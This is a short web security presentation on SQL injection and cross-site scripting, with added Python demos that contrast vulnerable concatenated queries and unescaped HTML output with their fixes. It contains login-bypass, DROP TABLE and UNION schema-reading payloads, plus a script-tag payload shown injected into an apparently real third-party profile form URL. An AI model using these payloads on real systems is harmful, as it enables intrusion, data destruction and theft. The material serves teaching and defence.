Web security 2010

One of my short presentations on web security (with demos):
- SQL injection
- Cross-site scripting

Published in: Technology

  1. Software Security
  2. What is software security?
     • Application security encompasses measures taken throughout the application's life-cycle to prevent exceptions in the security policy of an application or the underlying system (vulnerabilities) through flaws in the design, development, deployment, upgrade, or maintenance of the application.
  3. Why is software security important?
     • Leakage of sensitive data.
     • Crash of the entire application or database.
     • Fixing issues after an attack is more expensive and time-consuming than fixing them during development.
     • Quality of the product.
  4. Common vulnerabilities in web applications
     • SQL injection
     • Cross-site scripting (XSS)
     • Buffer overflows
     • HTTP response splitting
  5. 2010 statistics of web vulnerabilities
  6. What is SQL injection?
     • SQL injection is a code injection technique that exploits a vulnerability in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string-literal escape characters embedded in SQL statements or is not strongly typed, so that attacker-supplied text is executed as part of the SQL statement.
  7. How does it work?
  8. Demonstration
  9. Login using SQL injection
     "SELECT * FROM users WHERE name = '" + userName + "' AND password = '" + password + "';"
  10. Payloads entered in the login form:
     a' or 't'='t
     1' or 1=1
  11. Resulting queries:
     SELECT * FROM users WHERE name = '' AND password = '';
     SELECT * FROM users WHERE name = 'admin' AND password = 'pass123';
     SELECT * FROM users WHERE name = 'a' OR 't'='t' AND password = 'a' OR 't'='t';
     SELECT * FROM users WHERE name = 'a' OR 't'='t' AND password = 'a' OR 't'='t'; DROP TABLE users; --';
     Because 't'='t' is always true, the WHERE clause matches every row and the login succeeds without a valid password. The last variant also appends a second statement; it runs only if the database driver accepts stacked queries.
  12. More exploits using SQL injection
     SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
     SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='customers'
     (INFORMATION_SCHEMA exists in MySQL, SQL Server and PostgreSQL; other databases expose their catalog under different names.)
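To make slides 9 to 12 concrete, here is an added example that is not part of the presentation: it assembles the slide-9 query by string concatenation against an in-memory SQLite database, runs the slide-10/11 payloads through it, shows the parameterised query that defeats them, attempts the stacked DROP TABLE payload, and reads the table list through the injection point in the spirit of slide 12. The sample accounts, the hypothetical function names and the choice of SQLite (whose catalog is sqlite_master rather than INFORMATION_SCHEMA) are assumptions of the demo.

```python
import sqlite3

# Constructed sample accounts for the demo (not from the presentation).
SAMPLE_USERS = [("admin", "pass123"), ("alice", "s3cret")]


def make_db():
    """In-memory SQLite database with the users table the slides query."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def run_vulnerable_query(conn, user_name, password):
    """Slide 9 as written: the statement is built by string concatenation,
    so a quote character in the input changes the SQL grammar."""
    query = ("SELECT * FROM users WHERE name = '" + user_name +
             "' AND password = '" + password + "'")
    return conn.execute(query).fetchall()


def login_vulnerable(conn, user_name, password):
    """Login check on top of the concatenated query (the vulnerable form)."""
    return len(run_vulnerable_query(conn, user_name, password)) > 0


def login_safe(conn, user_name, password):
    """Hardened form: bound parameters. The driver passes the values
    separately from the SQL text, so a quote in the input is just data."""
    rows = conn.execute(
        "SELECT * FROM users WHERE name = ? AND password = ?",
        (user_name, password),
    ).fetchall()
    return len(rows) > 0


def stacked_query_attempt(conn):
    """Slide 11's 'DROP TABLE users; --' payload in the password field.
    Returns (executed, table_survived). Whether stacked statements run
    depends on the driver: Python's sqlite3 refuses more than one statement
    per execute() call, so here the DROP never runs. Drivers and databases
    that accept batches (SQL Server, for example) would execute it."""
    payload = "a' OR 't'='t'; DROP TABLE users; --"
    try:
        run_vulnerable_query(conn, "admin", payload)
        executed = True
    except (sqlite3.Warning, sqlite3.Error):
        executed = False
    survived = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type='table' AND name='users'"
    ).fetchone() is not None
    return executed, survived


def enumerate_tables_via_injection(conn):
    """Slide 12's idea: read the schema through the injection point.
    SQLite has no INFORMATION_SCHEMA, so the catalog is sqlite_master.
    The UNION must match the column count of the original SELECT
    (users has two columns) and '--' comments out the password clause."""
    payload = "x' UNION SELECT name, sql FROM sqlite_master WHERE type='table' --"
    rows = run_vulnerable_query(conn, payload, "ignored")
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    bypass = "a' or 't'='t"
    print("bypass against concatenated query:", login_vulnerable(db, bypass, bypass))
    print("bypass against parameterised query:", login_safe(db, bypass, bypass))
    print("tables read through the injection:", enumerate_tables_via_injection(db))
    print("stacked DROP (executed, table survived):", stacked_query_attempt(db))
```

The same payloads that log in through run_vulnerable_query are treated as literal user names and passwords by login_safe, which is the real fix behind the "escape questionable characters" advice later in the deck.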
  13. XSS (Cross-Site Scripting)
  14. Cross-site scripting
     • Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables attackers to inject client-side script into web pages viewed by other users.
  15. How it works: script injection
     • Same as before, but instead of placing the code in a URL, the script is submitted through the site's own non-validated forms and stored in its database.
     • When that data is retrieved from the database and a user loads the page, the script executes and the attack occurs.
     • The user would never know the code was executed without viewing the source of each page, since the link looks valid.
     • The application's owner is potentially liable, since the attack code is stored on their site.
  16. Payload:
     <SCRIPT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  17. The payload submitted in the firstname parameter of a profile form:
     http://www.easydoc.com.au/test/personalprofile.action
       ?address1= &suburb= &state= &zipcode=1 &homePhone= &mobilenumber= &reminderOption=0
       &title=Dr &firstname=<SCRIPT SRC="http://ha.ckers.org/xss.js"></SCRIPT> &lastname=Doctor
       &photoupload= &smsOption=0 &type=GP &reqNo=82
  18. Preventing SQL injection and XSS
     • SCRUB error handling: error messages divulge information that an attacker can use.
     • VALIDATE all user-entered parameters.
     • CHECK data types and lengths.
     • DISALLOW unwanted data (e.g. HTML tags, JavaScript).
     • ESCAPE questionable characters (ticks, --, semicolons, brackets, etc.).
     • Escaping by hand is the weakest of these: for SQL, use parameterised queries (bound variables) so that input is never parsed as SQL; for XSS, encode output for the HTML context it is written into rather than relying only on rejecting tags.
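An added example, not from the presentation, for slides 15 to 18: it decodes the firstname parameter from a request shaped like the one on slide 17, renders it into a profile page both by plain concatenation and with HTML encoding, and repeats the stored variant from slide 15 where the value is saved first and rendered later. The host name, the reduced parameter set, the function names and the dict standing in for the database are assumptions of the demo.

```python
import html
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# The payload from slide 16 (a script tag pointing at the XSS cheat-sheet host).
PAYLOAD = '<SCRIPT SRC="http://ha.ckers.org/xss.js"></SCRIPT>'


def build_request_url(firstname):
    """Constructed request shaped like slide 17's personalprofile.action URL.
    The host and the reduced parameter set are assumptions for the demo."""
    query = urlencode({"title": "Dr", "firstname": firstname,
                       "lastname": "Doctor", "type": "GP"})
    return "http://profile.example/test/personalprofile.action?" + query


def firstname_from_url(url):
    """What the server sees after decoding the query string."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("firstname", [""])[0]


def render_profile_unsafe(firstname, lastname):
    """Vulnerable: untrusted input concatenated into the page. The browser
    parses the injected <SCRIPT SRC=...> and fetches the attacker's script."""
    return "<h1>Profile: " + firstname + " " + lastname + "</h1>"


def render_profile_safe(firstname, lastname):
    """Hardened: HTML-encode at output time for the element-body context.
    The payload becomes visible text (&lt;SCRIPT ...&gt;) and is never parsed
    as markup. Attribute values, URLs and inline JavaScript need their own
    context-specific encoding; html.escape alone is not enough there."""
    return "<h1>Profile: {} {}</h1>".format(html.escape(firstname),
                                            html.escape(lastname))


# Stored XSS (slide 15): the same input saved and rendered on a later request.
# A dict stands in for the database table (constructed for the demo).
def save_profile(store, user_id, firstname, lastname):
    """Persist the submitted profile without any output encoding (storage is
    the wrong place to encode; the bug or the fix lives at render time)."""
    store[user_id] = (firstname, lastname)


def view_profile(store, user_id, safe):
    """Render a stored profile with either the vulnerable or the safe renderer."""
    firstname, lastname = store[user_id]
    renderer = render_profile_safe if safe else render_profile_unsafe
    return renderer(firstname, lastname)


def contains_live_script_tag(rendered_html):
    """Detection helper: is there an unencoded <script ...> tag in the output?"""
    return re.search(r"<script\b", rendered_html, re.IGNORECASE) is not None


if __name__ == "__main__":
    url = build_request_url(PAYLOAD)
    firstname = firstname_from_url(url)
    print("decoded firstname:", firstname)
    print("unsafe render:", render_profile_unsafe(firstname, "Doctor"))
    print("safe render:  ", render_profile_safe(firstname, "Doctor"))
    profiles = {}
    save_profile(profiles, 82, firstname, "Doctor")
    print("stored, unsafe view has live script:",
          contains_live_script_tag(view_profile(profiles, 82, safe=False)))
    print("stored, safe view has live script:  ",
          contains_live_script_tag(view_profile(profiles, 82, safe=True)))
```

Note that the fix is applied where the data is written into HTML, not where it is received: the stored value is identical in both views, and only the renderer decides whether the browser sees markup or text.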
  19. Thank You
